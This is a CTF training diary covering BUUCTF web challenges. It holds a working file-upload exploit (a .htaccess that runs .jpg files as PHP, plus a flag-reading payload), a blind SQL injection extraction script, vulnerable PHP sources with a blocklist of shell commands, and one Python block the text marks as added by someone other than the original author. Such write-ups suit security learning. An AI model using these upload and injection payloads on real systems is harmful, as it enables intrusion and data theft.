[BUUCTF] Day 9 Training Diary
Table of contents
- [De1CTF 2019]SSRF Me
- [安洵杯 2019]easy_web
- [GXYCTF2019]BabyUpload
- [BJDCTF2020]Mark loves cat
- 我有一个数据库 (I Have a Database)
- [BJDCTF2020]The mystery of ip
- [BJDCTF2020]ZJCTF,不过如此 (ZJCTF, Nothing More Than This)
- [GKCTF2020]CheckIN
- [GYCTF2020]Ezsqli
[De1CTF 2019]SSRF Me
[安洵杯 2019]easy_web
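First I opened the page; seeing a cmd parameter in the URL, I assumed it was RCE, and then I saw the hint.
Decoding twice in a row gives what looks like an MD5 number. I thought it was MD5, but I'm still too much of a noob: it turned out to be a hexadecimal number.
index.php
Generate the parameter TmprMlpUWTBOalUzT0RKbE56QTJPRGN3, then decode the result that comes back: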
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
    background:url(./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
Then a and b cannot be sent with HackBar, because HackBar encodes the values once by default, so use Burp.
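The img parameter layering that caused the confusion above (two base64 layers around a hex string), together with the filename filter from index.php, modelled in Python. This is an added example, not part of the original post; the function names decode_img, encode_img and server_view are hypothetical.

```python
import base64
import re


def _b64(text):
    """Base64-decode while tolerating stripped '=' padding, as PHP's
    lenient base64_decode() does (assumes only alphabet characters)."""
    return base64.b64decode(text + "=" * (-len(text) % 4))


def decode_img(param):
    """Undo the img encoding: base64 -> base64 -> hex digits -> filename."""
    hex_text = _b64(_b64(param).decode("ascii")).decode("ascii")
    return bytes.fromhex(hex_text).decode("latin-1")


def encode_img(name):
    """Build an img value for a filename: hex -> base64 -> base64."""
    hex_text = name.encode("latin-1").hex()
    inner = base64.b64encode(hex_text.encode("ascii"))
    return base64.b64encode(inner).decode("ascii")


def server_view(param):
    """Model what index.php does with img.

    Returns (filename_after_filter, allowed), or None when the value does
    not decode. The filter strips every character outside [a-zA-Z0-9.],
    so path separators never reach file_get_contents(), and any name
    containing "flag" (case-insensitive) is refused.
    """
    try:
        name = decode_img(param)
    except ValueError:  # bad base64, non-ASCII layer, or bad hex digits
        return None
    name = re.sub(r"[^a-zA-Z0-9.]+", "", name)
    return name, re.search(r"flag", name, re.I) is None


if __name__ == "__main__":
    # Both values appear on this page; the first is the default in the redirect.
    for value in ("TXpVek5UTTFNbVUzTURabE5qYz0",
                  "TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"):
        print(value, "->", server_view(value))
```
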
[GXYCTF2019]BabyUpload
import requests

url = "http://a49eadda-16e3-4db7-8d9c-6bc1aa62bca8.node3.buuoj.cn"
session = requests.session()

# First upload: a .htaccess that maps .jpg files to the PHP handler
htaccess = {'uploaded': ('.htaccess', "AddType application/x-httpd-php .jpg", 'image/jpeg')}
r1 = session.post(url, files=htaccess)

# Second upload: a .jpg whose body is a PHP script block that reads /flag
files2 = {'uploaded': ('6.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res = session.post(url, files=files2)
print(res.text)
Then visit it to get the flag.
[BJDCTF2020]Mark loves cat
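The page opens to a pile of useless content; sure enough, it is a git source leak.
The BUU docker environment broke and held me up for a bit; it is fine now.
This is the key code: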
<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;
我有一个数据库 (I Have a Database)
Too easy: CVE-2018-12613
[BJDCTF2020]The mystery of ip
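I didn't save the earlier part and can't be bothered to write it up.
Found nothing. Off to read the writeups.
Smarty template injection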
[BJDCTF2020]ZJCTF,不过如此 (ZJCTF, Nothing More Than This)
Code audit
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
    include($file);  //next.php
}
else{
    highlight_file(__FILE__);
}
?>
Local file inclusion combined with PHP pseudo-protocols (stream wrappers)
preg_replace() /e modifier command execution
[GKCTF2020]CheckIN
[GYCTF2020]Ezsqli
import requests

url = "http://5a3ceadf-9981-4fb8-a8c0-5a04a4d8fbf1.node3.buuoj.cn/index.php"
result = ""
i = 0

while True:
    i = i + 1
    # Binary search over the printable ASCII range for character i
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # payload = "0^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})".format(i, mid)
        payload = "0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})".format(i, mid)
        data = {"id": payload}
        r = requests.post(url, data=data)
        r.encoding = "utf-8"
        # print(url+payload)
        # "Nu1L" in the response means the comparison was true
        if "Nu1L" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid
    last = result
    # head stays at 32 once there are no more characters to read
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)